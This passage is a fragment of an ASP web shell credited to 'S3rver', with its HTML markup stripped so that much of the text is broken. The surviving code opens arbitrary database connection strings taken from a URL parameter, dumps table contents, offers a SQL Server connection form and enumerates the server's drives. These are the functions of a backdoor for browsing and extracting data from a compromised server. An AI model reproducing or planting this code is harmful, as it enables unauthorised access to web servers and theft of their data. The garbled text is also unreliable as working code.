" Set objConn = Server.CreateObject("ADODB.Connection") Set objRcs = Server.CreateObject("ADODB.RecordSet") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Trim(Request.QueryString("path")) objConn.Open objRcs.Open table,objConn, adOpenKeyset , , adCmdText Response.Write "" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" do while not objRcs.EOF Response.Write "" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" objRcs.MoveNext loop Response.Write "
   "&objRcs.Fields(i).Name&"   
"&objRcs.Fields(i).Value&" 

" END SELECT Else showdisks=FALSE checa = checking(cprthtml,keydec) Call hdr() Response.Write "
" Response.Write "
SQL Server connection string:
" Response.Write "" Response.Write "
" response.Write "" Response.Write "
" response.Write "
" End IF Case "about" showdisks=FALSE checa = checking(cprthtml,keydec) Call hdr() response.Write "


Coded By S3rver" response.Write "

" response.Write "WebSite: :)" response.Write "
" response.Write "E-Mail: Pouya.S3rver@Gmail.Com" response.Write "

" response.Write "Hackers, Crackers, Programmers Forever!" Case Else checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp Call showcontent() End Select If Err.Number <> 0 Then Response.Write "
ERRO: " & Err.Number & "

" & UCase(Err.Description) & "
Acesse denied." End If Response.Write endcode if showdisks then %> <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") Response.Write "


" for each drive_ in objFSO.Drives Response.Write "" next Response.Write "" Response.Write "
Drives
" Response.write ";" if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]" if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]" if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]" if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]" Response.Write "
" Response.write "H Local Path" Response.Write "

" end if %>
µ